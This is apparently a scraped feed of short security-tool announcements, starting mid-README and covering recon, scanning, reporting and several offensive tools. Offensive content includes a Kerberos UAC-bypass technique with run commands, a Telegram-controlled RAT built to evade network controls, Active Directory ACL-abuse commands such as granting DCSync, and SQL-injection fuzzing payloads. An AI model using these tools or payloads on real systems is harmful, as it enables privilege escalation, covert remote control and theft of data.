__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



KRBUACBypass - UAC Bypass By Abusing Kerberos Tickets

By: Zion3R


This POC is inspired by James Forshaw (@tiraniddo) shared at BlackHat USA 2022 titled “Taking Kerberos To The Next Level ” topic, he shared a Demo of abusing Kerberos tickets to achieve UAC bypass. By adding a KERB-AD-RESTRICTION-ENTRY to the service ticket, but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to easily initiate Kerberos requests and manipulate Kerberos tickets.

You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.


Tgtdeleg Trick

We cannot manually generate a TGT as we do not have and do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) in his Kekeo A trick (tgtdeleg) was added that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.

Tgtdeleg abuses the Kerberos GSS-API to obtain available TGTs for the current user without obtaining elevated privileges on the host. This method uses the AcquireCredentialsHandle function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext function for HOST/DC.domain.com using the ISC_REQ_DELEGATE flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP-REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to “Rubeus – Now With More Kekeo”.

With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:

  1. Use the Tgtdeleg trick to get the user's TGT.
  2. Use the TGT to request the KDC to generate a new service ticket for the local computer. Add a KERB-AD-RESTRICTION-ENTRY, but fill in a fake MachineID.
  3. Submit the service ticket into the cache.

Krbscm

Once you have a service ticket, you can use Kerberos authentication to access Service Control Manager (SCM) Named Pipes or TCP via HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC: SCMUACBypass.cpp, through the two APIs HOOK AcquireCredentialsHandle and InitializeSecurityContextW, the name of the authentication package called by SCM (pszPack age ) to Kerberos to enable the SCM to use Kerberos when authenticating locally.

Let’s see it in action

Now let's take a look at the running effect, as shown in the figure below. First request a ticket for the HOST service of the current server through the asktgs function, and then create a system service through krbscm to gain the SYSTEM privilege.

KRBUACBypass.exe asktgs
KRBUACBypass.exe krbscm




TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R


Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


Installation:

1. git clone https://github.com/machine1337/TelegramRAT.git
2. Now Follow the instructions in HOW TO USE Section.

HOW TO USE:

1. Go to Telegram and search for https://t.me/BotFather
2. Create Bot and get the API_TOKEN
3. Now search for https://t.me/chatIDrobot and get the chat_id
4. Now Go to client.py and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python client.py For Windows and python3 client.py For Linux
6. Now Go to the bot which u created and send command in message field

HELP MENU:

HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location

Features:

1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added

Author:

Coded By: Machine1337
Contact: https://t.me/R0ot1337


LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver, search url for LFI Vuln and when get an root text on the screen, it notifies you of the successful payload.

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions

By: Zion3R


This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.

    Requirements

    Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.

    How to Run

    • Make sure you have Python 3.x installed on your system.
    • pip install -r requirements.txt
    • Clone or download the script file wallet_transaction_monitor.py from this repository.
    • Place the sound file (in .wav format) you want to use for the notification in the same directory as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.
    • Open a terminal or command prompt and navigate to the directory where the script is located.
    • Run the script by executing the following command:
    python wallet_transaction_monitor.py

    The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.

    Important Notes

    This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.



    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)

    You can then install SysReptor with via script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.





    ZeusCloud - Open Source Cloud Security

    By: Zion3R


    ZeusCloud is an open source cloud security platform.

    Discover, prioritize, and remediate your risks in the cloud.

    • Build an asset inventory of your AWS accounts.
    • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
    • Prioritize findings with graphical context.
    • Remediate findings with step by step instructions.
    • Customize security and compliance controls to fit your needs.
    • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

    Quick Start

    1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
    2. Run: cd ZeusCloud && make quick-deploy
    3. Visit http://localhost:80

    Check out our Get Started guide for more details.

    A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

    Sandbox

    Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

    Features

    • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
    • Graphical Context - Understand context behind security findings with graphical visualizations.
    • Access Explorer - Visualize who has access to what with an IAM visualization engine.
    • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
    • Configurability - Configure which security rules are active, which alerts should be muted, and more.
    • Security as Code - Modify rules or write your own with our extensible security as code approach.
    • Remediation - Follow step by step guides to remediate security findings.
    • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

    Why ZeusCloud?

    Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

    We had to take action.

    • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
    • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
    • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
    • Best of all, you can use ZeusCloud for free!

    Future Roadmap

    • Integrations with vulnerability scanners
    • Integrations with secret scanners
    • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
    • Support for Azure and GCP environments

    Contributing

    We love contributions of all sizes. What would be most helpful first:

    • Please give us feedback in our Slack.
    • Open a PR (see our instructions below on developing ZeusCloud locally)
    • Submit a feature request or bug report through Github Issues.

    Development

    Run containers in development mode:

    cd frontend && yarn && cd -
    docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

    Reset neo4j and/or postgres data with the following:

    rm -rf .compose/neo4j
    rm -rf .compose/postgres

    To develop on frontend, make the the code changes and save.

    To develop on backend, run

    docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

    To access the UI, go to: http://localhost:80.

    Security

    Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

    Open-source vs. cloud-hosted

    This repo is freely available under the Apache 2.0 license.

    We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

    Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



    Acltoolkit - ACL Abuse Swiss-Knife

    By: Zion3R


    acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses.


    Installation

    pip install acltoolkit-ad

    or

    git clone https://github.com/zblurx/acltoolkit.git
    cd acltoolkit
    make

    Usage

    usage: acltoolkit [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-scheme ldap scheme]
    target {get-objectacl,set-objectowner,give-genericall,give-dcsync,add-groupmember,set-logonscript} ...

    ACL abuse swiss-army knife

    positional arguments:
    target [[domain/]username[:password]@]<target name or address>
    {get-objectacl,set-objectowner,give-genericall,give-dcsync,add-groupmember,set-logonscript}
    Action
    get-objectacl Get Object ACL
    set-objectowner Modify Object Owner
    give-genericall Grant an object GENERIC ALL on a targeted object
    give-dcsync Grant an object DCSync capabilities on the domain
    add-groupmember Add Member to Group
    set-logonscript Change Logon Sript of User

    options :
    -h, --help show this help message and exit
    -debug Turn DEBUG output ON
    -no-pass don't ask for password (useful for -k)
    -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
    command line
    -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
    -scheme ldap scheme

    authentication:
    -hashes LMHASH:NTHASH
    NTLM hashes, format is LMHASH:NTHAS H

    Commands

    get-objectacl

    $ acltoolkit get-objectacl -h
    usage: acltoolkit target get-objectacl [-h] [-object object] [-all]

    options:
    -h, --help show this help message and exit
    -object object Dump ACL for <object>. Parameter can be a sAMAccountName, a name, a DN or an objectSid
    -all List every ACE of the object, even the less-interesting ones

    The get-objectacl will take a sAMAccountName, a name, a DN or an objectSid as input with -object and will list Sid, Name, DN, Class, adminCount, LogonScript configured, Primary Group, Owner and DACL of it. If no parameter supplied, will list informations about the account used to authenticate.

    $ acltoolkit waza.local/jsmith:Password#123@192.168.56.112 get-objectacl
    Sid : S-1-5-21-267175082-2660600898-836655089-1103
    Name : waza\John Smith
    DN : CN=John Smith,CN=Users,DC=waza,DC=local
    Class : top, person, organizationalPerson, user
    adminCount : False

    Logon Script
    scriptPath : \\WAZZAAAAAA\OCD\test.bat
    msTSInitialProgram: \\WAZZAAAAAA\OCD\test.bat

    PrimaryGroup
    Sid : S-1-5-21-267175082-2660600898-836655089-513
    Name : waza\Domain Users
    DN : CN=Domain Users,OU=Builtin Groups,DC=waza,DC=local

    [...]

    OwnerGroup
    Sid : S-1-5-21-267175082-2660600898-836655089-512
    Name : waza\Domain Admins

    Dacl
    ObjectSid : S-1-1-0
    Name : Everyone
    AceType : ACCESS_ALLOWED_OBJECT_ACE
    Ac cessMask : 256
    ADRights : EXTENDED_RIGHTS
    IsInherited : False
    ObjectAceType : User-Change-Password

    [...]

    ObjectSid : S-1-5-32-544
    Name : BUILTIN\Administrator
    AceType : ACCESS_ALLOWED_ACE
    AccessMask : 983485
    ADRights : WRITE_OWNER, WRITE_DACL, GENERIC_READ, DELETE, EXTENDED_RIGHTS, WRITE_PROPERTY, SELF, CREATE_CHILD
    IsInherited : True

    set-objectowner

    $ acltoolkit set-objectowner -h
    usage: acltoolkit target set-objectowner [-h] -target-sid target_sid [-owner-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid targeted
    -owner-sid owner_sid New Owner Sid

    The set-objectowner will take as input a target sid and an owner sid, and will change the owner of the target object.

    give-genericall

    $ acltoolkit give-genericall -h
    usage: acltoolkit target give-genericall [-h] -target-sid target_sid [-granted-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid targeted
    -granted-sid owner_sid
    Object Sid granted GENERIC_ALL

    The give-genericall will take as input a target sid and a granted sid, and will change give GENERIC_ALL DACL to the granted SID to the target object.

    give-dcsync

    $ acltoolkit give-dcsync -h
    usage: acltoolkit target give-dcsync [-h] [-granted-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -granted-sid owner_sid
    Object Sid granted DCSync capabilities

    The give-dcsync will take as input a granted sid, and will change give DCSync capabilities to the granted SID.

    add-groupmember

    $ acltoolkit add-groupmember -h
    usage: acltoolkit target add-groupmember [-h] [-user user] -group group

    options:
    -h, --help show this help message and exit
    -user user User added to a group
    -group group Group where the user will be added

    The add-groupmember will take as input a user sAMAccountName and a group sAMAccountName, and will add the user to the group

    set-logonscript

    $ acltoolkit set-logonscript -h
    usage: acltoolkit target set-logonscript [-h] -target-sid target_sid -script-path script_path [-logonscript-type logonscript_type]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid of targeted user
    -script-path script_path
    Script path to set for the targeted user
    -logonscript-type logonscript_type
    Logon Script variable to change (default is scriptPath)

    The set-logonscript will take as input a target sid and a script path, and will the the Logon Script path of the targeted user to the script path specified.



    SOC-Multitool - A Powerful And User-Friendly Browser Extension That Streamlines Investigations For Security Professionals

    By: Zion3R


    Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more efficient. Now available on the Chrome Web Store and compatible with all Chromium-based browsers such as Microsoft Edge, Chrome, Brave, and Opera.
    Now available on Chrome Web Store!


    Streamline your investigations

    SOC Multi-tool eliminates the need for constant copying and pasting during investigations. Simply highlight the text you want to investigate, right-click, and navigate to the type of data highlighted. The extension will then open new tabs with the results of your investigation.

    Modern and feature-rich

    The SOC Multi-tool is a modernized multi-tool built from the ground up, with a range of features and capabilities. Some of the key features include:

    • IP Reputation Lookup using VirusTotal & AbuseIPDB
    • IP Info Lookup using Tor relay checker & WHOIS
    • Hash Reputation Lookup using VirusTotal
    • Domain Reputation Lookup using VirusTotal & AbuseIPDB
    • Domain Info Lookup using Alienvault
    • Living off the land binaries Lookup using the LOLBas project
    • Decoding of Base64 & HEX using CyberChef
    • File Extension & Filename Lookup using fileinfo.com & File.net
    • MAC Address manufacturer Lookup using maclookup.com
    • Parsing of UserAgent using user-agents.net
    • Microsoft Error code Lookup using Microsoft's DB
    • Event ID Lookup (Windows, Sharepoint, SQL Server, Exchange, and Sysmon) using ultimatewindowssecurity.com
    • Blockchain Address Lookup using blockchain.com
    • CVE Info using cve.mitre.org

    Easy to install

    You can easily install the extension by downloading the release from the Chrome Web Store!
    If you wish to make edits you can download from the releases page, extract the folder and make your changes.
    To load your edited extension turn on developer mode in your browser's extensions settings, click "Load unpacked" and select the extracted folder!


    SOC Multi-tool is a community-driven project and the developer encourages users to contribute and share better resources.



    Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

    By: Zion3R


    Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

    This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


    Usage

    Injection Enumeration >> https://github.com/gh0x0st Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
    PS C:\> .\wanderer.exe

    >> Process Injection Enumeration
    >> https://github.com/gh0x0st

    Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

    Target Options:

    -i, --id, Target a single or group of processes by their id number
    -n, --name, Target a single or group of processes by their name
    -c, --current, Target the current process and reveal the current privilege level
    -a, --all, Target every running process

    Filter Options:

    --include-denied, Include instances where process access is denied
    --exclude-32, Exclude instances where the process architecture is 32-bit
    --exclude-64, Exclude instances where the process architecture is 64-bit
    --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
    --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
    --exclude-integrity, Exclude instances where the process integrity level is a specific value

    Output Options:

    --output-nested, Output the results in a nested style view
    -q, --quiet, Do not output the banner

    Examples:

    Enumerate the process with id 12345
    C:\> wanderer --id 12345

    Enumerate all processes with the names process1 and processs2
    C:\> wanderer --name process1,process2

    Enumerate the current process privilege level
    C:\> wanderer --current

    Enumerate all 32-bit processes
    C:\wanderer --all --exclude-64

    Enumerate all processes where is AMSI is loaded
    C:\> wanderer --all --exclude-amsiunloaded

    Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
    C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

    Screenshots

    Example 1

    Example 2

    Example 3

    Example 4

    Example 5



    Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

    By: Zion3R


    This tools is very helpful for finding vulnerabilities present in the Web Applications.

    • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
      • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
      • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

    Tools Used

    Serial No. Tool Name Serial No. Tool Name
    1 whatweb 2 nmap
    3 golismero 4 host
    5 wget 6 uniscan
    7 wafw00f 8 dirb
    9 davtest 10 theharvester
    11 xsser 12 fierce
    13 dnswalk 14 dnsrecon
    15 dnsenum 16 dnsmap
    17 dmitry 18 nikto
    19 whois 20 lbd
    21 wapiti 22 devtest
    23 sslyze

    Working

    Phase 1

    • User has to write:- "python3 web_scan.py (https or http) ://example.com"
    • At first program will note initial time of running, then it will make url with "www.example.com".
    • After this step system will check the internet connection using ping.
    • Functionalities:-
      • To navigate to helper menu write this command:- --help for update --update
      • If user want to skip current scan/test:- CTRL+C
      • To quit the scanner use:- CTRL+Z
      • The program will tell scanning time taken by the tool for a specific test.

    Phase 2

    • From here the main function of scanner will start:
    • The scanner will automatically select any tool to start scanning.
    • Scanners that will be used and filename rotation (default: enabled (1)
    • Command that is used to initiate the tool (with parameters and extra params) already given in code
    • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
      • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
      • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

    Definitions:-

    • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

    • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

    • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

    • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

    • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

    • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
      0.1 - 3.9 Low
      4.0 - 6.9 Medium
      7.0 - 8.9 High
      9.0 - 10.0 Critical

    Vulnerabilities

    • After this scanner will show results which inclues:
      • Response time
      • Total time for scanning
      • Class of vulnerability

    Remediation

    • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
    • Scanner tell about sources to know more about the vulnerabilities. (websites).
    • After this step, scanner suggests some remdies to overcome the vulnerabilites.

    Phase 3

    • Scanner will Generate a proper report including
      • Total number of vulnerabilities scanned
      • Total number of vulnerabilities skipped
      • Total number of vulnerabilities detected
      • Time taken for total scan
      • Details about each and every vulnerabilites.
    • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
    • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

    Use

    Use Program as python3 web_scan.py (https or http) ://example.com
    --help
    --update
    Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
    1 IPv6 2 Wordpress
    3 SiteMap/Robot.txt 4 Firewall
    5 Slowloris Denial of Service 6 HEARTBLEED
    7 POODLE 8 OpenSSL CCS Injection
    9 FREAK 10 Firewall
    11 LOGJAM 12 FTP Service
    13 STUXNET 14 Telnet Service
    15 LOG4j 16 Stress Tests
    17 WebDAV 18 LFI, RFI or RCE.
    19 XSS, SQLi, BSQL 20 XSS Header not present
    21 Shellshock Bug 22 Leaks Internal IP
    23 HTTP PUT DEL Methods 24 MS10-070
    25 Outdated 26 CGI Directories
    27 Interesting Files 28 Injectable Paths
    29 Subdomains 30 MS-SQL DB Service
    31 ORACLE DB Service 32 MySQL DB Service
    33 RDP Server over UDP and TCP 34 SNMP Service
    35 Elmah 36 SMB Ports over TCP and UDP
    37 IIS WebDAV 38 X-XSS Protection

    Installation

    git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
    cd Scanner-and-Patcher/setup
    python3 -m pip install --no-cache-dir -r requirements.txt

    Screenshots of Scanner

    Contributions

    Template contributions , Feature Requests and Bug Reports are more than welcome.

    Authors

    GitHub: @Malwareman007
    GitHub: @Riya73
    GitHub:@nano-bot01

    Contributing

    Contributions, issues and feature requests are welcome!
    Feel free to check issues page.



    Firefly - Black Box Fuzzer For Web Applications

    By: Zion3R

    Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

    Note:

    Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

     

    Advantages

    • Hevy use of gorutines and internal hardware for great preformance
    • Built-in engine that handles each task for "x" response results inductively
    • Highly cusomized to handle more complex fuzzing
    • Filter options and request verifications to avoid junk results
    • Friendly error and debug output
    • Build in payloads (default list are mixed with the wordlist from seclists)
    • Payload tampering and encoding functionality

    Features


    Installation

    go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

    If the above install method do not work try the following:

    git clone https://github.com/Brum3ns/firefly.git
    cd firefly/
    go build cmd/firefly/firefly.go
    ./firefly -h

    Usage

    Simple

    firefly -h
    firefly -u 'http://example.com/?query=FUZZ'

    Advanced usage

    Request

    Different types of request input that can be used

    Basic

    firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

    Request with different methods and protocols

    firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

    Pipeline

    echo 'http://example.com/?query=FUZZ' | firefly 

    HTTP Raw

    firefly -r '
    GET /?query=FUZZ HTTP/1.1
    Host: example.com
    User-Agent: FireFly'

    This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.

    firefly -r '
    POST /?A=1 HTTP/1.1
    Host: example.com
    User-Agent: Firefly
    X-Host: FUZZ

    B=2&C=3' -au replace

    Request Verifier

    Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)

    firefly -u 'http://example.com/?query=FUZZ' -e 

    Payloads

    Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.

    Payload debug

    Display the format of all payloads and exit

    firefly -show-payload

    Tampers

    List of all Tampers avalible

    firefly -list-tamper

    Tamper all paylodas with given type (More than one can be used separated by comma)

    firefly -u 'http://example.com/?query=FUZZ' -e s2c

    Encode

    firefly -u 'http://example.com/?query=FUZZ' -e hex

    Hex then URL encode all payloads

    firefly -u 'http://example.com/?query=FUZZ' -e hex,url

    Payload regex replace

    firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

    The Payloads: ' or (1=1)-- - and " or(20=20)or " Will result in: ' or (13=(37-24))-- - and " or(13=(37-24))or " Where the => (with spaces) inducate the "replace to".

    Filters

    Filter options to filter/match requests that include a given rule.

    Filter response to ignore (filter) status code 302 and line count 0

    firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

    Filter responses to include (match) regex, and status code 200

    firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
    firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

    Preformance

    Preformance and time delays to use for the request process

    Threads / Concurrency

    firefly -u 'http://example.com/?query=FUZZ' -t 35

    Time Delay in millisecounds (ms) for each Concurrency

    FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

    Wordlists

